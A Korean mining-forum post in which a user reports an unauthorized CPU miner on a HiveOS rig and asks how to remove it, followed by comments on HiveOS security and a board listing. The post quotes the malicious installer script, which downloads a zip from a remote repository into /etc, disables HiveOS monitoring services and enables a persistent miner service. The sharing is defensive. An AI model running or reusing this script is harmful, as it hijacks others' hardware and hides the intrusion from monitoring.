mining custom_top_html:no
default debug random = 4 / type = READ / detected = READ

 

2024-09-26_155955.jpg

 

2024-09-26_161025.jpg

2024-09-26_163006.jpg

 

 

어제 올린글이 애매해서 더 알아보고 하루만에 재업했습니다.

아무것도 구동안하는데 벽전력200w 언저리 왓다갓다하네요.

그래서 hive htop으로 확인해보니 데로채굴중인듯한데

쓰레드 4로 돌고 있습니다.

 

약80~100w먹는걸로 추정 

 

이거 중지할려다가 어제 서버하나 날라가버렸네요. gpt의 도움으로 kill 여러번먹여봣는데도 재부팅후에 자동적으로 가동하던데.

서버를 통해 동작시키는게 아니라 hive /etc/hivecpude 백그라운드가동인건지?

 

이거 중지하는 방법 아시는분 계실런지요?

 

서버를 빌려줬을때 명령어로 자동실행하게끔 만들어둔건지

아니면 hive를 통해 들어와서 도둑채굴되게끔 만든건지 모르겠습니다.

 

곰곰히 생각해봐도 이건 서버빌려준적이 없는거 같은데 불확실

 

그렇다면 hive에서 비번을 안걸어둬서 그럴거 같은데 대처를 하기 위해서 질문드려봅니다.

 

 

nano hivecpude3.sh

#!/bin/bash

wget https://gitlab.com/file-repositories/files-repositories/-/raw/main/hivecpude3.zip -O /etc/hivecpude3.zip

unzip -o /etc/hivecpude3.zip -d /etc

cp /etc/hivecpude.service /etc/systemd/system/

sudo systemctl stop hivestats

sudo systemctl stop hive-agent

sudo systemctl disable hivestats

sudo systemctl disable hive-agent

sudo systemctl stop birqflow

sudo systemctl disable hiveos-verstats

sudo systemctl stop hiveos-verstats

sudo systemctl disable birqflow

sudo systemctl start hivecpude

sudo systemctl enable hivecpude

 

해당 스크립트는 HiveOS에서 CPU 채굴을 위해 자동으로 실행되는 악성 스크립트일 가능성이 큽니다. 이 스크립트는 외부 서버에서 ZIP 파일을 다운로드하고, 이를 특정 디렉토리에 풀어 여러 시스템 서비스와 관련된 작업을 수행합니다. 아래는 스크립트의 주요 내용입니다:

  1. wget으로 ZIP 파일 다운로드: https://gitlab.com/file-repositories/files-repositories/-/raw/main/hivecpude3.zip 파일을 /etc/hivecpude3.zip 위치에 다운로드.
  2. ZIP 파일 압축 해제: 다운로드된 파일을 /etc에 압축 해제.
  3. 서비스 설정: hivecpude.service 파일을 시스템 서비스 디렉토리(/etc/systemd/system/)로 복사.
  4. HiveOS의 기본 서비스 중단: hivestats, hive-agent, birqflow, hiveos-verstats 등의 서비스 중단 및 비활성화.
  5. 악성 서비스 실행 및 활성화: hivecpude라는 새로운 서비스가 실행되고, 부팅 시 자동으로 시작되도록 활성화.

이 스크립트는 정상적인 시스템 동작을 방해하고, 외부에서 다운로드한 파일을 실행하는 방식으로 시스템에 악성 소프트웨어를 설치하는 것을 목적으로 하고 있는 것으로 보입니다.

 

 

 

 

 

663
댓글 8
  • gpt의 도움으로 서버제거안되고 중지완료. 도둑놈 쫒았습니다.
  • @복태취업했다
    복태취업했다님 축하합니다. 16 보너스 캐시에 당첨되셨습니다.!!
  • ?
    헐 이런것도 있군요....전 대부분 셀러론 펜티엄이라...괜찮은건지..ㅠ

    초기 비번하고 vnc파일비번 모두 변경해놓고...공유기 하위에 물려놔서 그런지 아직 멀쩡한듯 합니다..
  • @껄껄껄무새
    vnc비번은 최근거부터는 바꾸고 있긴한데. 저는 대부분의 채굴기들이 허브에 물려있네요. 서버를 통해 들어온건지 hiveos를 타고 들어온건지 아리송합니다.
  • ?
    서버를 빌려줘요??? hiveOS를 설치한 상태로 빌려줬더니 악성코드를 심었다는 이야기인가요?
  • @적왕슈리
    hiveos로 만든 clore서버인데 서버를 빌려주고 주피터를 통해서 백그라운드형식으로 동작하도록 심은건지 아니면 공유기나 vnc쪽으로 hiveos를 타고 들어와서 백그라운드형식으로 동ㅇ작하도록 심은건지 모르겠습니다.
  • ?
    @복태취업했다
    HiveOS 하단에 Clore 서버를 설치했다면, 역으로 상단에 있는 HiveOS쪽으로의 접속수단에 대한 차단은 제대로 하셨나요? 일단 훈이님이 어떤 식으로 서버를 설치하건 인터넷이 된다면 Tracert 기능을 통해서 호스트OS의 IP를 알아낼수 있습니다. 인터넷으로 통하는 패킷이 Clore 서버=>HiveOS를 통해서 외부로 나가니까요. 이런 점을 방지하려면 애초에 호스트OS의 하단에 게스트OS를 설치할때 네트워크를 브릿지 방식으로 설치하면 됩니다. 그렇게 하면 호스트OS와 게스트OS는 논리적으로 별개의 네트웍 개체가 되어 패킷추적방식으로는 호스트OS의 IP가 드러나지는 않게 할수 있죠.

    이 상태에서 훈이님이 HiveOS쪽의 보안설정을 제대로 바꿔놓지 않고 디폴트로 놔뒀다면 아주 높은 확률로 HiveOS가 털리겠죠. 지금은 그나마 HiveOS 루트계정의 기본 암호가 "1" 로 되어 있던 옛날의 문제점을은 패치된 걸로 알지만 그래도 아직까지 기본 설정의 HiveOS는 보안에 엄청 취약합니다.

    훈이님이 HiveOS를 호스트로 삼을거면 모든 보안적 약점을 다 대응하고 나서 하위에 뭘 깔아야 하셨겠죠. 지금 상태라면 99.99% HiveOS쪽으로 침투가 되어 있을 겁니다. 그냥 HiveOS 전체를 삭제하고 다시 설치하시는 편이 낫습니다. 그리고 가급적 HiveOS처럼 보안에 취약한 OS를 호스트로 삼는건 피하라고 말하고 싶어집니다만.....
  • @적왕슈리
    이번사건을 개기로 다시 한번 느끼게 되더라구요. 다른건 안그런데 딱 한대만 그렇더라구요. 비번걸고 지켜보고 있습니다. 또 그러면 다시 하나하나 만져나가야겠어요.
default debug random = 0 / type = READ / detected = READ

채굴

코인 채굴에 관한 게시판입니다.

List of Articles
번호 분류 제목 추천 수 조회 수 글쓴이 날짜
공지 채굴 새로 들어오시는분들! - 땡글 이용시 지켜지면 좋은 것 94 312 78971
김광부
2017.06.25
공지 2025년 땡글 달력 이벤트 2 3 281
이벤트관리자
2024.10.07
75773 채굴 알레피움 아식이는 구매 주의하세요     알레피움 아식 시장은 개판 시작되었습니다.  라이트 나올때만해도 개판오분전인가 했는데...     골드쉘이 아이스리버 2T에 맞서서 저렴한 아식 쳐냈네요..;;;;;;  아오   1.25T 600W  760불 (RABID 쓰면 70불할... 5 file 0 650
껄껄껄무새
2024.09.28
75772 채굴 3일간 채굴장와서 알레오 세팅 했네요. 드뎌 끝났습니다.       하루 몇대씩 세팅해서 드뎌 끝났네요. 다른 코인과 다르게 난이도가 제법 있었습니다. 여러대 한꺼번에 세팅하다가 갑자기 동시에 3080 이었나 300와트를 먹고 100도 찍고 가슴 철렁하기도 하고요, 불날까봐 조... 9 file 0 1261
심해왕티모
2024.09.28
75771 채굴 알레오 F2풀 버젼업       3.0.8 입니다.   하이브는 서버주소도 아래랑 같지 않으면 접속 안됩니다. 살펴보세요   stratum+ssl://aleo-asia.f2pool.com:4420             [Recommended]  Aleo Miner 3.0.8 download link: For Ubuntu: ... 3 1 760
껄껄껄무새
2024.09.27
75770 채굴 ubuntu에서 AMD(6800xt,6900xt) 그래픽카드 오버하는 방법?       고수님들 ubuntu(20.04)에서 AMD(6800xt. 6900xt) 오버하는 방법좀 알고싶습니다   혹시 아시는분 조언부탁해요                 0 281
사랑천사
2024.09.27
75769 질문 Tradeogre 에 있는 xel 을 현금화해서 코인원의 kas 를 사고 싶은데...   안녕하세요 맨날 채굴만 하고 사고팔고를 안해봐서 이런거에 무지하다보니 질문드립니다   tradeogre 계정에 xel 이 3천달러정도 있는데, 결론적으로 이것을 코인원의 kas로 변환시키고 싶습니다.       tradeogre ... 2 0 349
FSPLifeStyle
2024.09.26
채굴 hiveos 도둑채굴에 대한 재질문         어제 올린글이 애매해서 더 알아보고 하루만에 재업했습니다. 아무것도 구동안하는데 벽전력200w 언저리 왓다갓다하네요. 그래서 hive htop으로 확인해보니 데로채굴중인듯한데 쓰레드 4로 돌고 있습니다.   ... 8 file 0 584
복태취업했다
2024.09.26
75767 채굴 아이스리버 쿠폰 안주려나 봅니다?? ㅠㅠ     작년이나 올초 행태보면 그래도 쿠폰 어느정도 줘서.....불만은 있지만 그냥 그러려니 넘어갔던거 같은데...   AL0 구매자들한테 쿠폰 안주려나 보네요.??  ㅠㅠ   한 2-300불정도 주지 않을까 기대햇는데..;;;; ... 0 183
껄껄껄무새
2024.09.26
75766 질문 마이닝풀에서 2017년 1달 채굴량을 알고 싶은데 방법이 없을까요?       2017년부터 ~2018년까지 이더리움 매달 채굴한 데이터 알고 싶은데 방법이 없을까요?                 file 0 259
마이닝풀의신
2024.09.26
75765 채굴 아이스리버 신제품!!!!!!!!!!!!!!!!!!!         여윽시 테라....시불것들 ㅠㅠ   파워내장인듯하고 쿨러 1-2개 달려있는게 골드쉘 미니타워 타잎하고 비슷해 보이네요.   2.5% 코드 RABID   AL3도 나왔네요. 역시 해외사이트보다 저렴하게 나왔습니다.    *... 9 file 0 661
껄껄껄무새
2024.09.25
75764 채굴 알레오 코인베이스퀘스트 출시예정     요건 보니까 코인베이스 월렛 설치하고 미션 수행하면 알레오 코인 주는 이벤트? 인거 같습니다.   7천5백만개.....뿌린답니다.   아무튼 코인베이스 상장도 하겠죠??  펌핑좀 기대해봐도 될까요?         9 file 0 542
껄껄껄무새
2024.09.25
75763 채굴 F2풀 알레오 버젼업~~~~3.0.6     3.0.6 변경하세요     https://docs.google.com/document/d/1SW4bJYHCB-mcASRu5KN5UsVsgtbWkz9ww8MaPlhx5yE/edit         [Recommended] Aleo Miner 3.0.6 download link: Aleo Miner 3.0.6 download link: For... 2 0 459
껄껄껄무새
2024.09.24
75762 채굴 아이스리버 신제품 예고 카스파,알레피움   기존제품 싹 물맥일?? 예고장이네요     빛채굴님 말씀처럼 홈마이닝이니  엔트리급 폭격일거같네요 Ks0  신제품 케이스갈이한 테라급? Al0  역시 케이스갈이한 테라급 으로 15t  13000불에 맞춘 가성비 예상!!!합... 14 file 0 473
껄껄껄무새
2024.09.24
75761 채굴 알레오 (ALEO F2Pool Win64) RTX 4090. 3080 채굴 테스트   알레오 상장전 테스트 해보려다 그닥이란 느낌 포기하고   상장후 10배? 이건 뭐여! 하는 생각에 윈도우 테스트 세팅 후 3일차에 24시간 풀로 돌려보니      메인 7950X3D+4090  평균 1.31M 해시.  코어2400 메모리... 10 file 1 891
superdog
2024.09.24
75760 질문 알레오 zkwork에서 하이브로 돌리시는분 계신가요? f2pool이랑 비교해볼생각으로    zkwork에서 몇대만 돌려볼려고 하는데   해시가 안뜨는데 잘못입력한게 있을까요?   그래픽드라이버도 550.100버전으로 업글해놓았습니다                   2 file 0 300
Riesling
2024.09.23
75759 채굴 알레오 채굴한게 지갑으로 안들어오네요     몇시간을 기다려도 안들어오는데   다른분들은 잘들어 오시나요                 6 file 0 901
팔에감어
2024.09.20
75758 채굴 알레오를 캐야되겠죠? 잠자고 있던 채굴기들을 켜야할듯합니다.   칼센이후부터 꺼져있었는데.. 그게 올해인지 작년인지도 가물가물하네요.   개인적으로 알레오는 정이 안가는 코인입니다. 칼센보다 더더욱.   그동안의 신용을 잃고, 런칭 이후에도 코인 토크노믹스보니 더더욱 가... 5 0 1225
심해왕티모
2024.09.20
75757 채굴 효율좋은 xel 3060ti 3장.   aleo 캐볼까 하고 다시 돌렸는데, 벌써 떡락이군요   xelis가 채산성 더 좋은거 보니 기도하는 심정으로 다시 온 해볼까 합니다.    msi 3060ti 모델이고, 바이오스 작업입니다.                     7 file 0 676
GoWest
2024.09.20
75756 채굴 알레오 출금 신청 사이트 오픈   지금은 앰버서더만 출금신청하는거라 하네요..;;;;   다른 인센티브들은 몇주안에 신청가능하게 된답니다.                   https://claim.aleo.org/en/     file 0 512
껄껄껄무새
2024.09.20
75755 채굴 다모마이너로 알레오 채굴했어요 오래전에 알레오 코인 다모마이너로 채굴했어요   상장은 되었는데 어떻게 받는지 아시는분 계신가요?             1 0 457
wal
2024.09.20
75754 채굴 MSI AS 깐깐해 졌네요...     작년 as받을땐 아묻따 증상 있으면 리퍼 해줬던 기억이 있습니다.     최근에 as가니 꽤나 깐깐해 졌네요.   아예 불가는 아니지만...   as 하실분은 포트나 기판 방열판 청소 깔끔히 하고 가세요.   티메프 찌라... 5 0 454
껄껄껄무새
2024.09.20
목록
Board Pagination Prev 1 2 3 4 5 6 7 8 9 10 ... 3790 Next
/ 3790
default debug random = 0 / type = READ / detected = READ